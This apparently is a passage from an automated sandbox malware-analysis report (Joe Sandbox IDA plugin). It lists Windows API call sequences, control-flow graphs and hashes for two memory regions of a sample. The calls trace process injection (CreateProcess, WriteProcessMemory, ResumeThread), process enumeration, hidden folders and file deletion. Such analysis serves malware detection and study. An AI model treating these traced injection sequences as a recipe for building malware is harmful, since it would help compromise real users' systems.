              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AddressAllocFreeLibraryLoadProclstrcatlstrcmpi
              • String ID:
              • API String ID: 3164464694-0
              • Opcode ID: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction ID: 87f78207362c3635447f183b732f1d306dbece0f4372e1837fc003e5ae7ec5a2
              • Opcode Fuzzy Hash: c20eeef422c49ef5dacc71178ffe2c9559f1b83162b6f5b3ac7459e8ac5b62c8
              • Instruction Fuzzy Hash: 58410FB25002149FDB136B60CC89FAA77BCEF54700F45059ABB85EF155DF309680CEA5

              Control-flow Graph

              APIs
              • Sleep.KERNEL32(00001388), ref: 008B09BE
              • RtlExitUserThread.NTDLL(00000000), ref: 008B09C6
              • OpenMutexA.KERNEL32(001F0001,00000000), ref: 008B09E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 008B09FE
                • Part of subcall function 008B0A3E: CreateProcessA.KERNEL32(00000000,008B0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 008B0A45
                • Part of subcall function 008B0A3E: GetThreadContext.KERNEL32(?,00000000), ref: 008B0A6D
                • Part of subcall function 008B0A3E: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 008B0A98
                • Part of subcall function 008B0A3E: DuplicateHandle.KERNEL32(000000FF,000000FF,?,008B59EC,00000000,00000000,00000002), ref: 008B0ADD
                • Part of subcall function 008B0A3E: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 008B0B0B
                • Part of subcall function 008B0A3E: ResumeThread.KERNEL32(?), ref: 008B0B1B
                • Part of subcall function 008B0A3E: Sleep.KERNEL32(000003E8), ref: 008B0B2B
                • Part of subcall function 008B0A3E: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 008B0B42
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
              • String ID:
              • API String ID: 1099281029-0
              • Opcode ID: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction ID: b8e77915aaa469f9a7919645640e8e724e22a8445354bf0ba74d2d3ab9941029
              • Opcode Fuzzy Hash: 4974744534687c6ca16bfdd406f1a9e76377cc43cabe4b36b7facf944e6376f6
              • Instruction Fuzzy Hash: E4418271640214AFEF129F60CC85FAA77BCFF44744F040195BA49FE1E6DAB0AA90CE65

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,008B06E9), ref: 008B0701
              • lstrcmpiA.KERNEL32(?,00000000), ref: 008B071B
              • Sleep.KERNEL32(00001388), ref: 008B072E
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B074F
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0761
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B0782
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B0794
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 008B07B5
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 008B07C7
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 008B07DB
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 008B0822
              • Sleep.KERNEL32(00001388), ref: 008B0841
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 7d9abece32e59deb2306f504579d92ba5951c4a9d881836de2c6511d15905aec
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: D131FFB25002149EDB166F608C89FEA77BCFF44B44F4504A9BB85EE145EE309680CEA9

              Control-flow Graph

              APIs
              • lstrcat.KERNEL32(00000000,001D06C5), ref: 001D06DD
              • lstrcmpiA.KERNEL32(?,00000000), ref: 001D06F7
              • Sleep.KERNEL32(00001388), ref: 001D070A
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D072B
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D073D
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D075E
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D0770
              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000), ref: 001D0791
              • SetFileAttributesA.KERNEL32(00000000,00000002), ref: 001D07A3
              • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 001D07B7
              • VirtualFree.KERNEL32(00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00100000), ref: 001D07FE
              • Sleep.KERNEL32(00001388), ref: 001D081D
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: AttributesCreateDirectoryFile$SleepVirtual$AllocFreelstrcatlstrcmpi
              • String ID:
              • API String ID: 2622802024-0
              • Opcode ID: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction ID: 06228663ed976dd27bc9ed4a265eda734156d84a2f2ddccc23b7d78c7540adac
              • Opcode Fuzzy Hash: 2d5341e2d3486ad8ae313cfc35730e242c1b71eebb05ac8df6fd9b5554d17158
              • Instruction Fuzzy Hash: AE310EB25002149FDF176BA0CC89FAA77BCEF54B00F4504AABB85EE155DF709680CEA5

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 606 8b268a-8b2698 call 8b377f ExpandEnvironmentStringsA 609 8b269a-8b26a2 call 8b2605 606->609 610 8b26a4-8b26ae 606->610 617 8b26ed-8b26ee 609->617 612 8b26da-8b26db 610->612 613 8b26b0-8b26d2 call 8b26cc 610->613 616 8b26dc-8b26e9 lstrcat 612->616 613->616 621 8b26d4 lstrcat 613->621 619 8b26eb-8b26ec 616->619 620 8b26ff-8b2714 CreateFileA 616->620 619->617 622 8b2760-8b2761 620->622 623 8b2716-8b272d GetFileSize 620->623 621->612 624 8b272f 623->624 625 8b2754-8b275d CloseHandle 623->625 624->625 626 8b2731-8b2734 624->626 625->622 626->625 627 8b2736-8b274e ReadFile 626->627 627->625 628 8b2750-8b2751 627->628 628->625
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(008B267A,00000010,?,?,00000000,00000104), ref: 008B268F
              • lstrcat.KERNEL32(00000000,008B26C7), ref: 008B26D4
              • lstrcat.KERNEL32(00000000,00000000), ref: 008B26E7
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: 8f8cd8044e04d822f7a8de21d8c7b892cbdafb4edec8f708b7e5ef8558ee6646
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 0721BC70100108EFEF129F60CC49BDEBBB4FF21704F2441A9E914EE2A1D7309A659B58

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 583 1d2666-1d2674 call 1d375b ExpandEnvironmentStringsA 586 1d2676-1d267e call 1d25e1 583->586 587 1d2680-1d268a 583->587 594 1d26c9-1d26ca 586->594 588 1d268c-1d26ae call 1d26a8 587->588 589 1d26b6-1d26b7 587->589 592 1d26b8-1d26c5 lstrcat 588->592 598 1d26b0 lstrcat 588->598 589->592 596 1d26db-1d26f0 CreateFileA 592->596 597 1d26c7-1d26c8 592->597 599 1d273c-1d273d 596->599 600 1d26f2-1d2709 GetFileSize 596->600 597->594 598->589 601 1d270b 600->601 602 1d2730-1d2739 CloseHandle 600->602 601->602 603 1d270d-1d2710 601->603 602->599 603->602 604 1d2712-1d272a ReadFile 603->604 604->602 605 1d272c-1d272d 604->605 605->602
              APIs
              • ExpandEnvironmentStringsA.KERNEL32(001D2656,00000010,?,?,00000000,00000104), ref: 001D266B
              • lstrcat.KERNEL32(00000000,001D26A3), ref: 001D26B0
              • lstrcat.KERNEL32(00000000,00000000), ref: 001D26C3
              Strings
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: lstrcat$EnvironmentExpandStrings
              • String ID: \AC\
              • API String ID: 2903145849-1749977576
              • Opcode ID: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction ID: ac260bf76c843a472e3623527236a47fa4163778177da073c7882fb977aa97b2
              • Opcode Fuzzy Hash: 9add6d2c685be6ba9b11d7ae33e1f8ee7394e656f3ace74048cbccfc4307d2af
              • Instruction Fuzzy Hash: 8B21B071500208EFEF129F60CC49B9DBBB4FF20704F1441AAED64EE2A1D7309A61DB54

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 642 8b0a3e-8b0a4d call 8b377f CreateProcessA 645 8b0a53-8b0a75 GetThreadContext 642->645 646 8b0b51 call 8b0b58 642->646 645->646 647 8b0a7b-8b0aa0 VirtualProtectEx 645->647 650 8b0b56-8b0b57 646->650 647->646 649 8b0aa6-8b0ae5 DuplicateHandle 647->649 649->646 651 8b0ae7-8b0b13 WriteProcessMemory 649->651 651->646 652 8b0b15-8b0b21 ResumeThread 651->652 653 8b0b26-8b0b4a Sleep OpenMutexA 652->653 653->650 654 8b0b4c-8b0b4f 653->654 654->646 654->653
              APIs
              • CreateProcessA.KERNEL32(00000000,008B0A37,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 008B0A45
              • GetThreadContext.KERNEL32(?,00000000), ref: 008B0A6D
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 008B0A98
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,008B59EC,00000000,00000000,00000002), ref: 008B0ADD
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 008B0B0B
              • ResumeThread.KERNEL32(?), ref: 008B0B1B
              • Sleep.KERNEL32(000003E8), ref: 008B0B2B
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 008B0B42
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: ea0af126f90ebd72fd56751bc6176ff4b7e4b59ba65c3c53e200b6aab19e39b2
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: 29314F316401149FEF228F14CC95BAA77B8FF04754F0805D4AA49FE1E5DBB0AA90CE64

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 629 1d0a1a-1d0a29 call 1d375b CreateProcessA 632 1d0b2d call 1d0b34 629->632 633 1d0a2f-1d0a51 GetThreadContext 629->633 637 1d0b32-1d0b33 632->637 633->632 634 1d0a57-1d0a7c VirtualProtectEx 633->634 634->632 636 1d0a82-1d0ac1 DuplicateHandle 634->636 636->632 638 1d0ac3-1d0aef WriteProcessMemory 636->638 638->632 639 1d0af1-1d0afd ResumeThread 638->639 640 1d0b02-1d0b26 Sleep OpenMutexA 639->640 640->637 641 1d0b28-1d0b2b 640->641 641->632 641->640
              APIs
              • CreateProcessA.KERNEL32(00000000,001D0A13,00000007,?,?,00000000,00000000,00000000,00000004,00000000,00000000,?,00000000), ref: 001D0A21
              • GetThreadContext.KERNEL32(?,00000000), ref: 001D0A49
              • VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001D0A74
              • DuplicateHandle.KERNEL32(000000FF,000000FF,?,001D59C8,00000000,00000000,00000002), ref: 001D0AB9
              • WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 001D0AE7
              • ResumeThread.KERNEL32(?), ref: 001D0AF7
              • Sleep.KERNEL32(000003E8), ref: 001D0B07
              • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001D0B1E
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
              • String ID:
              • API String ID: 617592159-0
              • Opcode ID: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction ID: ce19243c9b0df2c36d4bc763ab7a42923e633e507f13726d36402ffde9f12f03
              • Opcode Fuzzy Hash: beeeac3a1acd6789deb01cd9b1c0b660ec5e97df5daadee7f8ea6533514987fe
              • Instruction Fuzzy Hash: 40314F716441549FEF238F20CC85FA977B8EF08744F080196AA49FE1E6DB709A90CE64
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008B0D6C
              • Sleep.KERNEL32(000003E8), ref: 008B0D82
              • Process32First.KERNEL32(?,00000000), ref: 008B0DA2
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 008B0DD7
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 008B0DED
              • Process32Next.KERNEL32(?,?), ref: 008B0E03
              • CloseHandle.KERNEL32(?), ref: 008B0E2F
              • Sleep.KERNEL32(000003E8), ref: 008B0E3A
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction ID: 4b03f0403f47856689798158294f4987e455a1d52e719cb46278a43f5af75bb1
              • Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction Fuzzy Hash: 84216035901118ABEF225F54CC54AEEB7B9FF08701F0901D9F919EA2D1CA309E508F54

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 655 1d0d29-1d0d3e 656 1d0d44-1d0d51 CreateToolhelp32Snapshot 655->656 656->656 657 1d0d53-1d0d86 Sleep Process32First 656->657 658 1d0d88-1d0d94 657->658 659 1d0df6-1d0e1c CloseHandle Sleep 657->659 660 1d0d95-1d0da4 658->660 659->656 661 1d0dcf-1d0de7 Process32Next 660->661 662 1d0da6-1d0dbb OpenProcess 660->662 661->659 664 1d0de9-1d0deb 661->664 662->661 663 1d0dbd-1d0dc9 call 1d0e21 CloseHandle 662->663 663->661 664->660 666 1d0ded-1d0df4 664->666 666->660
              APIs
              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001D0D48
              • Sleep.KERNEL32(000003E8), ref: 001D0D5E
              • Process32First.KERNEL32(?,00000000), ref: 001D0D7E
              • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 001D0DB3
              • CloseHandle.KERNEL32(00000000,0000094C,00000000), ref: 001D0DC9
              • Process32Next.KERNEL32(?,?), ref: 001D0DDF
              • CloseHandle.KERNEL32(?), ref: 001D0E0B
              • Sleep.KERNEL32(000003E8), ref: 001D0E16
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: CloseHandleProcess32Sleep$CreateFirstNextOpenProcessSnapshotToolhelp32
              • String ID:
              • API String ID: 2496627043-0
              • Opcode ID: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction ID: ee6ad697a178ae2bc881c5805d246c9a587973520cfdbe67655c646f3b3f64f8
              • Opcode Fuzzy Hash: 1d14222e008f5e06e437f4b2d3671cdf3121152bf9a7f5596c02336e82120a0a
              • Instruction Fuzzy Hash: 9F218031901514ABEF235FA4CC54BE9B7BABF48700F0901EAF909FA295CB309E908F54
              APIs
              • Sleep.KERNEL32(00000064), ref: 008B2A84
                • Part of subcall function 008B2BDF: Sleep.KERNEL32(00002710), ref: 008B2C50
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 008B2B26
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 008B2B6A
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 008B2BC0
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 008B2BD4
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: 01aee93792beba932c4aef3f3956b1ca5969a1a7bb5a1bab1fe3d272e0f5e475
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: 7F313371500225AEDF226F708D49FEB77BCFF94704F400999B945EA142DE349690CEA6
              APIs
              • Sleep.KERNEL32(00000064), ref: 001D2A60
                • Part of subcall function 001D2BBB: Sleep.KERNEL32(00002710), ref: 001D2C2C
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001D2B02
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001D2B46
              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001D2B9C
              • Sleep.KERNEL32(03E80032,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001D2BB0
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: DeleteFileSleep
              • String ID:
              • API String ID: 3161721237-0
              • Opcode ID: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction ID: 61b954c1bd1fbd78b85a59315dca18815e24e1c638c8a45731d4a6c5ed37217e
              • Opcode Fuzzy Hash: ccc77a8dcdda45c6555d732deb7b8c046add19b0ac98e93311101b284191132d
              • Instruction Fuzzy Hash: 983135715002155EDB226F71CD89FAB77BCEFB0704F40049BEA55DA151DF749680CAA1
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 008B330A
              • GetStartupInfoA.KERNEL32(00000000), ref: 008B3354
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,008B32D5,00000011,?,00000000,00A00000), ref: 008B3381
              • CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B338D
              • CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B3399
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction ID: 38133a0bfb964b64351e3cc04e4a6488f990d40f43ab3ee865591e2372c53d68
              • Opcode Fuzzy Hash: 8a98a979b3afe01a6b6469a2d28bd76d619105e30e33d273b309531e6d902268
              • Instruction Fuzzy Hash: D81133B24045549EEF126F64CC89AEF77FCFF50305F0144A9E985EA105DE349A80CE96
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001D32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001D3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001D32B1,00000011,?,00000000,00A00000), ref: 001D335D
              • CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3369
              • CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3375
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction ID: ca119f87e6564d96ab8ed056a7c5a770e30a9494ccb9aa1ae5ea548ac38d7778
              • Opcode Fuzzy Hash: 6ef1046e979766cc6ae92eefffdb347189846863c06da508cd063bcdd7f37a45
              • Instruction Fuzzy Hash: 9B1163B2404514AEEF126B60CC85FAFB7FDEF50305F0144AAE995A6101DB345A80CFA2
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 008B330A
              • GetStartupInfoA.KERNEL32(00000000), ref: 008B3354
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,008B32D5,00000011,?,00000000,00A00000), ref: 008B3381
              • CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B338D
              • CloseHandle.KERNEL32(?,?,008B32D5,00000011,?,00000000,00A00000,00A00000,008B318E,00000004,00000000), ref: 008B3399
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction ID: 39f68ae7aed22e4cc231e6d60fb353ee287a41849d1e946453a2f6f2300169c4
              • Opcode Fuzzy Hash: 1ed0a1048e4db589b072e246fe77845ab2280c6c5e036d8c10e77b5e41e76f05
              • Instruction Fuzzy Hash: 0B1121728045189EEF12AF64CC85AEFB7FCFF50306F0144A9E985EA115DE345A80CF96
              APIs
              • lstrcat.KERNEL32(00000000,00000000), ref: 001D32E6
              • GetStartupInfoA.KERNEL32(00000000), ref: 001D3330
              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001D32B1,00000011,?,00000000,00A00000), ref: 001D335D
              • CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3369
              • CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3375
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
              • String ID:
              • API String ID: 3387338972-0
              • Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction ID: 4898629ae1575c2a6c00cfedea2a643d153d5f3e0f2924a97351e763eb4c9dbe
              • Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
              • Instruction Fuzzy Hash: 5F1121B2804518AEEF136B60CD85FAFB7F8EF50305F0544AAE995E6105DB345A80CF92
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 008B270C
              • GetFileSize.KERNEL32(?,00000000), ref: 008B2725
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 008B2746
              • CloseHandle.KERNEL32(?), ref: 008B2757
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: 4415cd313af6573c5803c68abb41c848deb20e42dd3b7ace96c82c84d21ec496
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: BD01E830640209FBEF159F64CC46B9DBAB8FF00B44F2041A8AA14F91E0DB70AA259A58
              APIs
              • CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001D26E8
              • GetFileSize.KERNEL32(?,00000000), ref: 001D2701
              • ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001D2722
              • CloseHandle.KERNEL32(?), ref: 001D2733
              Memory Dump Source
              • Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_1d0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandleReadSize
              • String ID:
              • API String ID: 3919263394-0
              • Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction ID: 22bbcec27c61fcb70d23e7d303d7652f54cfda03ac3870a1a4cd7cb4abfbd8c7
              • Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
              • Instruction Fuzzy Hash: DA01FF30640209FFEF219F60CC46F9D7AB4EF20B44F1041A9FA24FD1E0D770AA619A18
              APIs
              • CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 008B2780
              • SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 008B279D
              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 008B27B9
              • CloseHandle.KERNEL32(?), ref: 008B27CA
              Memory Dump Source
              • Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_34_2_8b0000_bin.jbxd
              Similarity
              • API ID: File$CloseCreateHandlePointerWrite
              • String ID:
              • API String ID: 3604237281-0
              • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
              • Instruction ID: 3cb71162d1e0526bb7dc00376cea817333ef4789e191d4f88406bf12076e32d3
              • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
